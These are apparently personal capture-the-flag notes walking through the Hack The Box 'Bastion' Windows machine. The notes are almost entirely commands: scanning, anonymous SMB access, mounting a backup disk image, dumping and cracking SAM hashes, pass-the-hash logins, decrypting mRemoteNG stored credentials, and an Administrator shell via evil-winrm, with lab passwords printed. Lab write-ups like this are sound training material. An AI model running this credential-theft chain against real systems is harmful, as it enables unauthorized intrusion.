Bastion


HTB Windows

nmap -A -p- -oA secnotes 10.129.178.250 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -sC -sV -O -p- -oA secnotes 10.129.178.250

nmap -sU -O -p- -oA secnotes-udp 10.129.178.250

nikto -h 10.129.178.250:80

crackmapexec smb 10.129.1.39

smbclient //10.129.1.39/Backups -N

sudo mkdir /mnt/smb

mount -t cifs "//10.129.1.39/Backups" /mnt/smb

cd /mnt/smb

tree

sudo rmmod nbd

sudo modprobe nbd

ls /dev

sudo qemu-nbd -r -c /dev/nbd0 "/mnt/smb/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351/9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd"

sudo mount /mnt/vhd

sudo mkdir /mnt/vhd

sudo mount /dev/nbd0p1 /mnt/vhd

We did not find user.txt.

We move to the config directory.

We try to make a copy of the SAM.

crackmapexec smb bastion.htb -u 'Administrator' -H '31d6c…'

crackmapexec smb bastion.htb -u 'L4mpje' -H '2611…'

crackmapexec winrm bastion.htb -u 'L4mpje' -H '2611…'

The password: bureaulampje

john --wordlist=/usr/share/wordlists/rockyou.txt hash --format=NT

ssh L4mpje@bastion.htb

whoami /priv

whoami /all

We see mRemoteNG.

cd C:\PROGRA~2

cd C:\Users\L4mpje\AppData\Roaming\mRemoteNG

type C:\Users\L4mpje\AppData\Roaming\mRemoteNG\confCons.xml

git clone https://github.com/haseebT/mRemoteNG-Decrypt

python mremoteng_decrypt.py -s 'aEWNFVS…'

We obtain the credentials -> Administrator:thXLHM96BeKL0ER2

crackmapexec smb bastion.htb -u 'Administrator' -p 'thXLHM96BeKL0ER2'

evil-winrm -i bastion.htb -u 'Administrator' -p 'thXLHM96BeKL0ER2'

© 2025 Cu3rv0x